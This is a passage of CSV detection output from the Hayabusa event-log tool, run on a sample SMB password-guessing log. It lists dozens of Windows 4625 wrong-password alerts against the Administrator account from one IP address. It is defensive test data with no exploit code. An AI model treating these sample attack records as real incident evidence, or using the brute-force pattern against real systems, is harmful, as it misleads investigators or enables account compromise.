NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z0odyPQmvkGRNWZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b5uRpG0fxCK75DPV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d9dcEzpJRW5YA8Bj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv3B9bwB1YIaBa6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJf9Obml4aVxE5zp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mvnSOaRSkGU6Uf5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JSAkZsZsv0SaLKaO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6rnM6QbwfbbrcGy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RX0GW7K5wdQJUx4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xm7CpD5i735McsvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bHxjZsnR25J47Ez8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1JWj91m79FyykH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h9i0GncOzpz5REWp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BODZRJ6G3xxw29VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ2lq4piINfmI7Qe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NqDeXdOitJ3WY8w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FnoHQf7QDxoI4tel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqkbgrtBa5VFxPry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TMD57GtY15bfWBre : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3lT9UgWr82PcAjf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SpwhTfFlvvccnI5N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 10CfKdnvWf4UVuME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYLMax3okIqntHM1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qk9TPAK51EdVORwY : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVKRUnNu2nGslW7P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJ2AYRLcMbMVixg6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Sl9ucxM2Nu3xjNq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AFeBGB6qA7OaYV7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLUEKG9CzQYsH3Vp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVZ44YKdRYY59zaC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: umU8pDDZFvvUVsHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nn7rA0uRegtHgaF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dgiakCKweT4GUGD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kptipiLujNVePYfy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: plaXJ1rEGpU3SzV2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I4pALF2luLfg36GC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZLO4cufbFcRhRy8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a845OfrFKxy31Yhg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QnPM7uhs8y4BaP6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fW5FzQ4jbWDJxXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huKy3ruTPAlx94pI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g78Kx7hkMuUGIoX1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: erSXtXvMi8Cg1PWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VaqXgO2US87zoXLl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHEfAfFuAR2pX3LO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4Owk2elGaC5DOm1U : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VXPynWzVNADN56a4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwfwZ0hXFaFwqymH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYlZwLsvrsuqUZ4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvGrzr30eVl5TGhA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tqdJcHWbdGcIIHBr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDt69bIJ1yI6PXLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtE2uMuOe8QPAKOj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BWQDlZDgFj9NmMhJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncQiyLyHCXr8knGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XjVmLfmcPMYbmdin : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gU2HjzjDxHsnvENI : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cUPn5CEz2LtwRwvZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCz069oBFXqpshbU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dzhc9PVRVP69tshD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejA3ZNfKWEs8zAMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U5egiL2PGOrYCHv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYhIM3zla6KcbKbM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjyQJnVBO4iC9Tkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g6Tpp8TRa2nRxHzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DyLvo5Bn2HzyANdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaXNThuZDGqJ7oCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 42Sb7p19cQsEV30b : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: An6629wgflzSgqY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iO7JktEihqddmEtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nG97BFOgKxnZaqi4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SH2D24c6nRGDL4Oe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiu2yfaM2JQQZoLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
